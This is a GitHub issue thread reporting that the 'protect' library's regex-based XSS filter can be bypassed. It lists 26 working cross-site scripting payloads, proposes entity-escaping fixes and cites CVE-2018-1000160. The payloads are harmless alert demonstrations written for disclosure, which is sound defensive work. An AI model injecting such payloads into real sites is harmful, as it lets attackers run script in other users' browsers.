Vulnerable to XSS attacks

[cianmce]

I found multiple XSS Attack vectors that aren't caught by the isXss function: https://github.com/RisingStack/protect/blob/60b0c91e86686d34e5202419ce9ae7e8dc08edcd/lib/rules/xss.js#L4-L13

tl;dr

Don't use regex's for sanitization of HTML but if you are, then at least strip out all tags with something like:

const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')

But with even this, I'd imagine a carefully constructed XSS vector could get around it I'd advise:

• Escaping the characters using HTML entities e.g.

  var entityMap = {
  '&': '&',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '/': '&#x2F;',
  '`': '&#x60;',
  '=': '&#x3D;'
  };
  escapeHtml = function(value) {
  return String(value).replace(/[&<>"'`=\/]/g, function (s) {
  return entityMap[s];
  });
  }

• Using a nodes text attribute(This isn't an option for server side code) e.g.

  document.getElementById("my_id").innerText = unsafeString;

---

As discussed in many posts e.g.

• https://stackoverflow.com/a/535022
• https://www.quora.com/What-is-a-good-regular-expression-for-preventing-XSS-attacks-in-JavaScript

Regular expressions are not a valid approach when dealing with a more complicated language(especially when browsers support dirty HTML)

For example, here are 26 valid XSS attack vectors that are all reported as false

Attack Vectors

<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 11')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 12')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 13')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > 
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > 
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > 
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
  <!-- XSS - 26: No JavaScript, but fully hides the page and prevents any clicks -->
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">

Proof Of Concept

These have been tested on the current function, the updated function to test for any tags, being escaped and being set using the text attribute. The results can be seen here: http://embed.plnkr.co/xHbhB29JWWyMUMeHsLrm

I'm sure there are many other edge cases I haven't thought of yet or that haven't been developed by browsers yet.

If you insist on using regex, here's a good list + just remove any tag https://github.com/PHPIDS/PHPIDS/blob/master/lib/IDS/default_filter.json

[cianmce]

CVE-2018-1000160 can be used to track this issue

[vdeturckheim]

@cianmce I am curious. Which CNA assigned this CVE?

[attritionorg]

@vdeturckheim Any CVE that is 7 digits the CNA will be DWF. You can also see the assigning CNA on CVE's web site as of earlier this year:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000160

Assigning CNA

Distributed Weakness Filing Project

[vdeturckheim]

@attritionorg good catch thanks.